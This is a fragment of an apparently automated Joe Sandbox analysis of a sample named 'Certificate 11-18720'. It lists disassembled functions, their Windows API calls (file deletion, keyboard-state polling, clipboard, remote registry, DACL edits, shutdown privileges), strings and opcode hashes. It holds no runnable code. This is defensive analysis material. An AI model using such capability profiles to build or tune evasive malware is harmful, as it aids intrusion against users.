                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                    • API String ID: 835046349-2428617273
                                                                                    • Opcode ID: ffb682b6ac2579e6802cb286a64374d131e60f8d3fa0f2e3305f7ec90e08871e
                                                                                    • Instruction ID: 437e6f5f4c771765ea2abe7097e6bfe97df3429dc7c340b96a122596079a5a30
                                                                                    • Opcode Fuzzy Hash: ffb682b6ac2579e6802cb286a64374d131e60f8d3fa0f2e3305f7ec90e08871e
                                                                                    • Instruction Fuzzy Hash: 94A100B2404345ABC314EB95C889EAFBBEDFF94704F44092EF58587291EB34D949CB62
                                                                                    Function 00611B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00611B50
                                                                                    • _wcscmp.LIBCMT ref: 00611B65
                                                                                    • _wcscmp.LIBCMT ref: 00611B7C
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00611B8E
                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00611BA8
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00611BC0
                                                                                    • FindClose.KERNEL32(00000000), ref: 00611BCB
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00611BE7
                                                                                    • _wcscmp.LIBCMT ref: 00611C0E
                                                                                    • _wcscmp.LIBCMT ref: 00611C25
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00611C37
                                                                                    • SetCurrentDirectoryW.KERNEL32(006739FC), ref: 00611C55
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00611C5F
                                                                                    • FindClose.KERNEL32(00000000), ref: 00611C6C
                                                                                    • FindClose.KERNEL32(00000000), ref: 00611C7C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1803514871-438819550
                                                                                    • Opcode ID: b3bf4563fcd6e7b191f46e0576587641a9d33f541b81428255fb55899735a76b
                                                                                    • Instruction ID: 4f2f224c6ae21e2bf7a4d2b68a9b01f81876ed0ea01f49df2597aef0bd460b7d
                                                                                    • Opcode Fuzzy Hash: b3bf4563fcd6e7b191f46e0576587641a9d33f541b81428255fb55899735a76b
                                                                                    • Instruction Fuzzy Hash: 22310835A0061A6FDF20DFB0DC48ADE77AEAF47310F044156FA05D7190EB74DA858E64
                                                                                    Function 00611C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00611CAB
                                                                                    • _wcscmp.LIBCMT ref: 00611CC0
                                                                                    • _wcscmp.LIBCMT ref: 00611CD7
                                                                                      • Part of subcall function 00606BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00606BEF
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00611D06
                                                                                    • FindClose.KERNEL32(00000000), ref: 00611D11
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00611D2D
                                                                                    • _wcscmp.LIBCMT ref: 00611D54
                                                                                    • _wcscmp.LIBCMT ref: 00611D6B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00611D7D
                                                                                    • SetCurrentDirectoryW.KERNEL32(006739FC), ref: 00611D9B
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00611DA5
                                                                                    • FindClose.KERNEL32(00000000), ref: 00611DB2
                                                                                    • FindClose.KERNEL32(00000000), ref: 00611DC2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1824444939-438819550
                                                                                    • Opcode ID: 342ad13868a972ff7d4ae87f0eaed5e9e6478280b12f91672bc0091ac9cc83f7
                                                                                    • Instruction ID: 6f4d6cb0a9c4011572dabf355dfc02db8fd3c530cbdf278a89376c2fe5a27ab3
                                                                                    • Opcode Fuzzy Hash: 342ad13868a972ff7d4ae87f0eaed5e9e6478280b12f91672bc0091ac9cc83f7
                                                                                    • Instruction Fuzzy Hash: 6631083190061A6BCF24EFA0EC09ADE77AF9F47324F184555FA11A72D0DB70DA858E58
                                                                                    Function 005C7D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memset
                                                                                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                    • API String ID: 2102423945-2023335898
                                                                                    • Opcode ID: 98412a4a4bb24fbf92b93369e61531b0601fb2378659924a85addd1726b2bcdc
                                                                                    • Instruction ID: e38aecbe08459bec32f8159fadc4b757fdeeb5f65c7dc0b83e3fe0832f05e6d4
                                                                                    • Opcode Fuzzy Hash: 98412a4a4bb24fbf92b93369e61531b0601fb2378659924a85addd1726b2bcdc
                                                                                    • Instruction Fuzzy Hash: DD829F71D04219DFCB24CF98C880BEDBBB2BF48314F2585AAD859AB351E7749D85CB90
                                                                                    Function 0061091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocalTime.KERNEL32(?), ref: 006109DF
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 006109EF
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006109FB
                                                                                    • __wsplitpath.LIBCMT ref: 00610A59
                                                                                    • _wcscat.LIBCMT ref: 00610A71
                                                                                    • _wcscat.LIBCMT ref: 00610A83
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00610A98
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00610AAC
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00610ADE
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00610AFF
                                                                                    • _wcscpy.LIBCMT ref: 00610B0B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00610B4A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                    • String ID: *.*
                                                                                    • API String ID: 3566783562-438819550
                                                                                    • Opcode ID: 40ed0efab204af4898cf6441819a889c2f144cec81816e235d56e1cdd6df54fc
                                                                                    • Instruction ID: 7243693765faac97b3332b884eaabc4853b823d27ea6e11943ae47960c4d3884
                                                                                    • Opcode Fuzzy Hash: 40ed0efab204af4898cf6441819a889c2f144cec81816e235d56e1cdd6df54fc
                                                                                    • Instruction Fuzzy Hash: 916169765082459FDB10DF60C844E9EB7E9FF89310F08491EF989C7251DB71EA85CB92
                                                                                    Function 005FA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005FABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 005FABD7
                                                                                      • Part of subcall function 005FABBB: GetLastError.KERNEL32(?,005FA69F,?,?,?), ref: 005FABE1
                                                                                      • Part of subcall function 005FABBB: GetProcessHeap.KERNEL32(00000008,?,?,005FA69F,?,?,?), ref: 005FABF0
                                                                                      • Part of subcall function 005FABBB: HeapAlloc.KERNEL32(00000000,?,005FA69F,?,?,?), ref: 005FABF7
                                                                                      • Part of subcall function 005FABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 005FAC0E
                                                                                      • Part of subcall function 005FAC56: GetProcessHeap.KERNEL32(00000008,005FA6B5,00000000,00000000,?,005FA6B5,?), ref: 005FAC62
                                                                                      • Part of subcall function 005FAC56: HeapAlloc.KERNEL32(00000000,?,005FA6B5,?), ref: 005FAC69
                                                                                      • Part of subcall function 005FAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,005FA6B5,?), ref: 005FAC7A
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005FA6D0
                                                                                    • _memset.LIBCMT ref: 005FA6E5
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005FA704
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 005FA715
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 005FA752
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005FA76E
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 005FA78B
                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 005FA79A
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 005FA7A1
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 005FA7C2
                                                                                    • CopySid.ADVAPI32(00000000), ref: 005FA7C9
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005FA7FA
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005FA820
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 005FA834
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3996160137-0
                                                                                    • Opcode ID: 5b64d274fc9308d211d5efcc44177474af26bce77b4a18ae7a3b21acf506bd91
                                                                                    • Instruction ID: 0dd226fcce5cffd439a3d2be8756027061ac798b88cd56925023dbe838dce2e3
                                                                                    • Opcode Fuzzy Hash: 5b64d274fc9308d211d5efcc44177474af26bce77b4a18ae7a3b21acf506bd91
                                                                                    • Instruction Fuzzy Hash: 46514CB590020AABDF11DFA5DC44EFEBBB9FF05340F048129FA15A7291D7789A05CB62
                                                                                    Function 005C6F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: f$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$fff f
                                                                                    • API String ID: 0-1889048015
                                                                                    • Opcode ID: 56caf345925b8d64e3eecb70b8283492600b8c39f6e7c018bdb667ec73dfd5e4
                                                                                    • Instruction ID: af568c51116541cc203eede6e01b2777fbf881fec0053dac9ab2f60250313ee7
                                                                                    • Opcode Fuzzy Hash: 56caf345925b8d64e3eecb70b8283492600b8c39f6e7c018bdb667ec73dfd5e4
                                                                                    • Instruction Fuzzy Hash: 17727075D0421ADBDF14CF98C890BAEBBB6BF48310F64456AE805AB781DB709A41DF90
                                                                                    Function 006063F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00606EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00605FA6,?), ref: 00606ED8
                                                                                      • Part of subcall function 006072CB: GetFileAttributesW.KERNEL32(?,00606019), ref: 006072CC
                                                                                    • _wcscat.LIBCMT ref: 00606441
                                                                                    • __wsplitpath.LIBCMT ref: 0060645F
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00606474
                                                                                    • _wcscpy.LIBCMT ref: 006064A3
                                                                                    • _wcscat.LIBCMT ref: 006064B8
                                                                                    • _wcscat.LIBCMT ref: 006064CA
                                                                                    • DeleteFileW.KERNEL32(?), ref: 006064DA
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006064EB
                                                                                    • FindClose.KERNEL32(00000000), ref: 00606506
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 2643075503-1173974218
                                                                                    • Opcode ID: 7db96efde138eb71451dc2af4cb8fc2e3163e98655008fa412c03a9b789c9bdb
                                                                                    • Instruction ID: d2ee7c3dc4b2e213c92739900237c068c3336246ed299ff7e4a66afefa8654bb
                                                                                    • Opcode Fuzzy Hash: 7db96efde138eb71451dc2af4cb8fc2e3163e98655008fa412c03a9b789c9bdb
                                                                                    • Instruction Fuzzy Hash: 6931B4B24483849AC325DBA4CC899DFB7DDAF96304F40491EF6D8C3181EA35D54987A7
                                                                                    Function 006231BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00623C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00622BB5,?,?), ref: 00623C1D
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0062328E
                                                                                      • Part of subcall function 005C936C: __swprintf.LIBCMT ref: 005C93AB
                                                                                      • Part of subcall function 005C936C: __itow.LIBCMT ref: 005C93DF
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0062332D
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006233C5
                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00623604
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00623611
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 1240663315-0
                                                                                    • Opcode ID: 4addf955558450c83169962181bfed17e38ee6954b2f3720f73c87108965afb1
                                                                                    • Instruction ID: 2b4788f5488fccb895e2929941cc2986323421b1258f00540222244d634859d9
                                                                                    • Opcode Fuzzy Hash: 4addf955558450c83169962181bfed17e38ee6954b2f3720f73c87108965afb1
                                                                                    • Instruction Fuzzy Hash: CBE15A34604621AFCB14DF68D895E6ABBE9FF89714B04886DF44A9B3A1CB34ED01CF51
                                                                                    Function 00602B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetKeyboardState.USER32(?), ref: 00602B5F
                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00602BE0
                                                                                    • GetKeyState.USER32(000000A0), ref: 00602BFB
                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00602C15
                                                                                    • GetKeyState.USER32(000000A1), ref: 00602C2A
                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00602C42
                                                                                    • GetKeyState.USER32(00000011), ref: 00602C54
                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00602C6C
                                                                                    • GetKeyState.USER32(00000012), ref: 00602C7E
                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00602C96
                                                                                    • GetKeyState.USER32(0000005B), ref: 00602CA8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: State$Async$Keyboard
                                                                                    • String ID:
                                                                                    • API String ID: 541375521-0
                                                                                    • Opcode ID: 03b886600d586efa6eea598086be08f7207340af03287d5d629fe60e8269ef10
                                                                                    • Instruction ID: 3851b7d826a25f4476ba43a774a200be8618173862f5bc83190f72edadc095fe
                                                                                    • Opcode Fuzzy Hash: 03b886600d586efa6eea598086be08f7207340af03287d5d629fe60e8269ef10
                                                                                    • Instruction Fuzzy Hash: 5041C5349847CB69FF7D9B60886C3EBBEA26F12308F048059D5C6567C1DB9499C4C7A2
                                                                                    Function 00616D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1737998785-0
                                                                                    • Opcode ID: af210c8969bca9adad2ba303520442918d0f17c381d0761f2fa0c69dcf36c48c
                                                                                    • Instruction ID: 2c8ed5da764bd7381d90d3fa0099408d145225473201fac3a1c07cd50777131f
                                                                                    • Opcode Fuzzy Hash: af210c8969bca9adad2ba303520442918d0f17c381d0761f2fa0c69dcf36c48c
                                                                                    • Instruction Fuzzy Hash: 4F21F439B00111AFDB10AF64EC49B6E77AAFF45710F05801AF90ADB3A1CB70ED418B54
                                                                                    Function 0061C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005F9ABF: CLSIDFromProgID.OLE32 ref: 005F9ADC
                                                                                      • Part of subcall function 005F9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 005F9AF7
                                                                                      • Part of subcall function 005F9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 005F9B05
                                                                                      • Part of subcall function 005F9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 005F9B15
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0061C235
                                                                                    • _memset.LIBCMT ref: 0061C242
                                                                                    • _memset.LIBCMT ref: 0061C360
                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0061C38C
                                                                                    • CoTaskMemFree.OLE32(?), ref: 0061C397
                                                                                    Strings
                                                                                    • NULL Pointer assignment, xrefs: 0061C3E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                    • String ID: NULL Pointer assignment
                                                                                    • API String ID: 1300414916-2785691316
                                                                                    • Opcode ID: 3c68faabb714cfba39265548607483f7263d9ed56958b8f373eefffcd8df1139
                                                                                    • Instruction ID: 0b5887eb29506c6715e55de236379fbffcca439e53d7d0bd1b52dc2138813956
                                                                                    • Opcode Fuzzy Hash: 3c68faabb714cfba39265548607483f7263d9ed56958b8f373eefffcd8df1139
                                                                                    • Instruction Fuzzy Hash: CA912771D00219AFDB10DFE4DC95EEEBBB9BF48310F14816AE519A7281DB709A45CFA0
                                                                                    Function 006079D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005FB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005FB180
                                                                                      • Part of subcall function 005FB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005FB1AD
                                                                                      • Part of subcall function 005FB134: GetLastError.KERNEL32 ref: 005FB1BA
                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00607A0F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
